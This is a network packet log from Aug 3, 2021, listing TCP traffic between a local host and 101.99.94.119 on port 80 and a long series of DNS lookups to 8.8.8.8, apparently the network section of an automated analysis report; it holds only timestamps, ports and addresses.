Aug 3, 2021 19:01:31.638253927 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.638273001 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.638297081 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.638530970 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.638550997 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.638586998 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.638612032 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.638636112 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.638660908 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.638685942 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.638709068 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.638731956 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.638755083 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.638871908 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.638875008 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.638909101 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.638909101 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.638940096 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.638964891 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.638988972 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.639013052 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.639038086 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.639062881 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.639086008 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.639110088 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.639137983 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.639158010 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.639190912 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.639234066 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.685801029 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.685841084 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.685864925 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.685889006 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.685905933 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.685926914 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.685945034 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.685967922 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.685991049 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686012983 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686033964 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686055899 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686077118 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686098099 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686120987 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686148882 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686173916 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686194897 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686219931 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686240911 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686263084 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686285019 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686307907 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686336040 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686362028 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686382055 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686398029 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686414957 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.686430931 CEST	80	49736	101.99.94.119	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 3, 2021 18:59:23.658386946 CEST	49199	53	192.168.2.3	8.8.8.8
Aug 3, 2021 18:59:23.685910940 CEST	53	49199	8.8.8.8	192.168.2.3
Aug 3, 2021 18:59:24.659580946 CEST	50620	53	192.168.2.3	8.8.8.8
Aug 3, 2021 18:59:24.685204029 CEST	53	50620	8.8.8.8	192.168.2.3
Aug 3, 2021 18:59:25.792309046 CEST	64938	53	192.168.2.3	8.8.8.8
Aug 3, 2021 18:59:25.817255974 CEST	53	64938	8.8.8.8	192.168.2.3
Aug 3, 2021 18:59:26.176440954 CEST	60152	53	192.168.2.3	8.8.8.8
Aug 3, 2021 18:59:26.210597992 CEST	53	60152	8.8.8.8	192.168.2.3
Aug 3, 2021 18:59:26.804635048 CEST	57544	53	192.168.2.3	8.8.8.8
Aug 3, 2021 18:59:26.833452940 CEST	53	57544	8.8.8.8	192.168.2.3
Aug 3, 2021 18:59:27.911753893 CEST	55984	53	192.168.2.3	8.8.8.8
Aug 3, 2021 18:59:27.936414957 CEST	53	55984	8.8.8.8	192.168.2.3
Aug 3, 2021 18:59:29.323223114 CEST	64185	53	192.168.2.3	8.8.8.8
Aug 3, 2021 18:59:29.349575043 CEST	53	64185	8.8.8.8	192.168.2.3
Aug 3, 2021 18:59:30.824228048 CEST	65110	53	192.168.2.3	8.8.8.8
Aug 3, 2021 18:59:30.856558084 CEST	53	65110	8.8.8.8	192.168.2.3
Aug 3, 2021 18:59:32.922413111 CEST	58361	53	192.168.2.3	8.8.8.8
Aug 3, 2021 18:59:32.947650909 CEST	53	58361	8.8.8.8	192.168.2.3
Aug 3, 2021 18:59:33.951771021 CEST	63492	53	192.168.2.3	8.8.8.8
Aug 3, 2021 18:59:33.979088068 CEST	53	63492	8.8.8.8	192.168.2.3
Aug 3, 2021 18:59:35.024971962 CEST	60831	53	192.168.2.3	8.8.8.8
Aug 3, 2021 18:59:35.049942017 CEST	53	60831	8.8.8.8	192.168.2.3
Aug 3, 2021 18:59:36.335195065 CEST	60100	53	192.168.2.3	8.8.8.8
Aug 3, 2021 18:59:36.361124039 CEST	53	60100	8.8.8.8	192.168.2.3
Aug 3, 2021 18:59:38.185023069 CEST	53195	53	192.168.2.3	8.8.8.8
Aug 3, 2021 18:59:38.232830048 CEST	53	53195	8.8.8.8	192.168.2.3
Aug 3, 2021 18:59:39.062377930 CEST	50141	53	192.168.2.3	8.8.8.8
Aug 3, 2021 18:59:39.089895010 CEST	53	50141	8.8.8.8	192.168.2.3
Aug 3, 2021 18:59:40.103996038 CEST	53023	53	192.168.2.3	8.8.8.8
Aug 3, 2021 18:59:40.143980026 CEST	53	53023	8.8.8.8	192.168.2.3
Aug 3, 2021 18:59:41.545511007 CEST	49563	53	192.168.2.3	8.8.8.8
Aug 3, 2021 18:59:41.572935104 CEST	53	49563	8.8.8.8	192.168.2.3
Aug 3, 2021 18:59:42.735898018 CEST	51352	53	192.168.2.3	8.8.8.8
Aug 3, 2021 18:59:42.763403893 CEST	53	51352	8.8.8.8	192.168.2.3
Aug 3, 2021 18:59:43.575406075 CEST	59349	53	192.168.2.3	8.8.8.8
Aug 3, 2021 18:59:43.609272957 CEST	53	59349	8.8.8.8	192.168.2.3
Aug 3, 2021 18:59:44.570820093 CEST	57084	53	192.168.2.3	8.8.8.8
Aug 3, 2021 18:59:44.659749985 CEST	53	57084	8.8.8.8	192.168.2.3
Aug 3, 2021 18:59:45.928265095 CEST	58823	53	192.168.2.3	8.8.8.8
Aug 3, 2021 18:59:45.956907034 CEST	53	58823	8.8.8.8	192.168.2.3
Aug 3, 2021 18:59:53.437380075 CEST	57568	53	192.168.2.3	8.8.8.8
Aug 3, 2021 18:59:53.474836111 CEST	53	57568	8.8.8.8	192.168.2.3
Aug 3, 2021 18:59:58.858021975 CEST	50540	53	192.168.2.3	8.8.8.8
Aug 3, 2021 18:59:58.901704073 CEST	53	50540	8.8.8.8	192.168.2.3
Aug 3, 2021 19:00:23.803713083 CEST	54366	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:00:23.845678091 CEST	53	54366	8.8.8.8	192.168.2.3
Aug 3, 2021 19:00:40.334332943 CEST	53034	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:00:40.378686905 CEST	53	53034	8.8.8.8	192.168.2.3
Aug 3, 2021 19:00:51.846848965 CEST	57762	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:00:51.885240078 CEST	53	57762	8.8.8.8	192.168.2.3
Aug 3, 2021 19:01:20.989435911 CEST	55435	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:01:21.041529894 CEST	53	55435	8.8.8.8	192.168.2.3
Aug 3, 2021 19:01:22.833671093 CEST	50713	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:01:22.883351088 CEST	53	50713	8.8.8.8	192.168.2.3
Aug 3, 2021 19:01:32.114979982 CEST	56132	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:01:32.150788069 CEST	53	56132	8.8.8.8	192.168.2.3
Aug 3, 2021 19:01:34.315417051 CEST	58987	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:01:34.349643946 CEST	53	58987	8.8.8.8	192.168.2.3
Aug 3, 2021 19:01:36.516494036 CEST	56579	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:01:36.548902035 CEST	53	56579	8.8.8.8	192.168.2.3
Aug 3, 2021 19:01:38.721241951 CEST	60633	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:01:38.753732920 CEST	53	60633	8.8.8.8	192.168.2.3
Aug 3, 2021 19:01:40.908818960 CEST	61292	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:01:40.941567898 CEST	53	61292	8.8.8.8	192.168.2.3
Aug 3, 2021 19:01:43.099242926 CEST	63619	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:01:43.134553909 CEST	53	63619	8.8.8.8	192.168.2.3
Aug 3, 2021 19:01:45.284416914 CEST	64938	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:01:45.317775965 CEST	53	64938	8.8.8.8	192.168.2.3
Aug 3, 2021 19:01:47.753312111 CEST	61946	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:01:47.786495924 CEST	53	61946	8.8.8.8	192.168.2.3
Aug 3, 2021 19:01:50.319245100 CEST	64910	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:01:50.345753908 CEST	53	64910	8.8.8.8	192.168.2.3
Aug 3, 2021 19:01:52.518642902 CEST	52123	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:01:52.544380903 CEST	53	52123	8.8.8.8	192.168.2.3
Aug 3, 2021 19:01:54.722306013 CEST	56130	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:01:54.762475014 CEST	53	56130	8.8.8.8	192.168.2.3
Aug 3, 2021 19:01:56.924621105 CEST	56338	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:01:56.959481955 CEST	53	56338	8.8.8.8	192.168.2.3
Aug 3, 2021 19:01:59.130711079 CEST	59420	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:01:59.165488958 CEST	53	59420	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:01.320058107 CEST	58784	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:01.352756977 CEST	53	58784	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:03.553585052 CEST	63978	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:03.588093042 CEST	53	63978	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:07.920561075 CEST	62938	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:07.945453882 CEST	53	62938	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:10.120966911 CEST	55708	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:10.148989916 CEST	53	55708	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:12.344211102 CEST	56803	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:12.380321980 CEST	53	56803	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:13.952964067 CEST	57145	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:14.006561041 CEST	53	57145	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:14.686839104 CEST	55359	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:14.720417976 CEST	53	55359	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:14.762020111 CEST	58306	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:14.794553041 CEST	53	58306	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:15.820312023 CEST	64124	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:15.853841066 CEST	53	64124	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:16.505778074 CEST	49361	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:16.530379057 CEST	53	49361	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:16.953767061 CEST	63150	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:16.986277103 CEST	53	63150	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:17.063890934 CEST	53279	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:17.122783899 CEST	53	53279	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:17.593175888 CEST	56881	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:17.625838995 CEST	53	56881	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:18.356370926 CEST	53642	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:18.391232014 CEST	53	53642	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:19.030920029 CEST	55667	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:19.066551924 CEST	53	55667	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:19.211441040 CEST	54833	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:19.246603966 CEST	53	54833	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:19.856076956 CEST	62476	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:19.889893055 CEST	53	62476	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:20.262491941 CEST	49705	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:20.295572042 CEST	53	49705	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:21.429611921 CEST	61477	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:21.462229967 CEST	53	61477	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:23.626596928 CEST	61633	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:23.651187897 CEST	53	61633	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:25.812108994 CEST	55949	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:25.846793890 CEST	53	55949	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:28.016876936 CEST	57601	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:28.050857067 CEST	53	57601	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:30.218873978 CEST	49342	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:30.252289057 CEST	53	49342	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:32.420996904 CEST	56253	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:32.456573009 CEST	53	56253	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:34.679191113 CEST	49667	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:34.704158068 CEST	53	49667	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:36.880808115 CEST	55439	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:36.915652990 CEST	53	55439	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:39.080692053 CEST	57069	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:39.113240957 CEST	53	57069	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:41.443295956 CEST	57659	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:41.475824118 CEST	53	57659	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:43.643707991 CEST	54717	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:43.676137924 CEST	53	54717	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:45.850692987 CEST	63975	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:45.884254932 CEST	53	63975	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:48.038158894 CEST	56639	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:48.070511103 CEST	53	56639	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:50.265275955 CEST	51856	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:50.297590971 CEST	53	51856	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:52.473217964 CEST	56546	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:52.508933067 CEST	53	56546	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:54.709424973 CEST	62152	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:54.752672911 CEST	53	62152	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:57.038458109 CEST	53470	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:57.072422028 CEST	53	53470	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:00.213896036 CEST	56446	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:00.250510931 CEST	53	56446	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:02.430080891 CEST	59631	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:02.455005884 CEST	53	59631	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:04.613842010 CEST	55515	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:04.646204948 CEST	53	55515	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:06.893040895 CEST	64547	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:06.928741932 CEST	53	64547	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:09.084055901 CEST	51759	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:09.116533041 CEST	53	51759	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:11.271615028 CEST	59207	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:11.308238029 CEST	53	59207	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:13.477817059 CEST	54269	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:13.514050961 CEST	53	54269	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:15.679207087 CEST	54856	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:15.711858988 CEST	53	54856	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:17.865520954 CEST	64140	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:17.903259039 CEST	53	64140	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:20.084985018 CEST	62271	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:20.122246981 CEST	53	62271	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:22.322797060 CEST	57404	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:22.355321884 CEST	53	57404	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:24.522763014 CEST	62997	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:24.558729887 CEST	53	62997	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:26.742661953 CEST	57712	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:26.767282009 CEST	53	57712	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:28.930773973 CEST	60065	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:28.955493927 CEST	53	60065	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:31.135622978 CEST	55068	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:31.168095112 CEST	53	55068	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:33.318119049 CEST	64700	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:33.353689909 CEST	53	64700	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:35.511454105 CEST	61998	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:35.545561075 CEST	53	61998	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:37.775151014 CEST	53724	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:37.810373068 CEST	53	53724	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:39.970947981 CEST	52328	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:40.006287098 CEST	53	52328	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:42.164659977 CEST	58051	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:42.196994066 CEST	53	58051	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:44.354120970 CEST	64130	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:44.389393091 CEST	53	64130	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:46.570506096 CEST	50491	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:46.604208946 CEST	53	50491	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:48.773654938 CEST	53004	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:48.798176050 CEST	53	53004	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:50.951783895 CEST	52529	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:50.985971928 CEST	53	52529	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:53.197990894 CEST	53656	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:53.231578112 CEST	53	53656	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:55.415544033 CEST	62724	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:55.451174021 CEST	53	62724	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:57.632731915 CEST	56059	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:57.659317017 CEST	53	56059	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:59.824805975 CEST	63060	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:59.858313084 CEST	53	63060	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:02.424027920 CEST	51498	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:02.451447010 CEST	53	51498	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:05.025619984 CEST	59943	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:05.058403969 CEST	53	59943	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:07.243323088 CEST	50118	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:07.278501987 CEST	53	50118	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:09.483490944 CEST	58357	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:09.519002914 CEST	53	58357	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:11.765233040 CEST	55804	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:11.806792974 CEST	53	55804	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:14.084388971 CEST	58079	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:14.118324041 CEST	53	58079	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:16.275333881 CEST	52080	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:16.308108091 CEST	53	52080	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:16.873356104 CEST	55238	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:16.920137882 CEST	53	55238	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:17.141740084 CEST	49289	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:17.169322014 CEST	53	49289	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:17.514652967 CEST	61034	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:17.563154936 CEST	53	61034	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:18.478743076 CEST	51964	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:18.513947010 CEST	53	51964	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:20.698674917 CEST	58241	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:20.731728077 CEST	53	58241	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:22.901813030 CEST	59571	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:22.938019991 CEST	53	59571	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:24.441721916 CEST	51708	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:24.489818096 CEST	53	51708	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:25.226316929 CEST	60709	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:25.258712053 CEST	53	60709	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:27.418201923 CEST	63643	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:27.443067074 CEST	53	63643	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:29.198559046 CEST	62823	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:29.233833075 CEST	53	62823	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:29.557809114 CEST	63750	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:29.601564884 CEST	53	63750	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:29.614897013 CEST	61959	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:29.647238970 CEST	53	61959	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:31.996125937 CEST	63554	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:32.033607960 CEST	53	63554	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:34.188719988 CEST	57723	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:34.233795881 CEST	53	57723	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:36.419224977 CEST	58663	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:36.463515043 CEST	53	58663	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:38.651132107 CEST	50980	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:38.686813116 CEST	53	50980	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:40.952564955 CEST	50067	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:40.992608070 CEST	53	50067	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:43.204242945 CEST	52992	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:43.237854958 CEST	53	52992	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:45.405143023 CEST	55129	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:45.437777042 CEST	53	55129	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:47.623676062 CEST	60959	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:47.660789967 CEST	53	60959	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:49.844846964 CEST	58319	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:49.880382061 CEST	53	58319	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:52.075742960 CEST	64785	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:52.111000061 CEST	53	64785	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:54.286129951 CEST	50208	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:54.321608067 CEST	53	50208	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:56.573766947 CEST	62477	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:56.613110065 CEST	53	62477	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:58.795171022 CEST	54467	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:58.823889971 CEST	53	54467	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:01.028712034 CEST	60548	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:01.053582907 CEST	53	60548	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:03.249236107 CEST	59623	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:03.279337883 CEST	53	59623	8.8.8.8	192.168.2.3
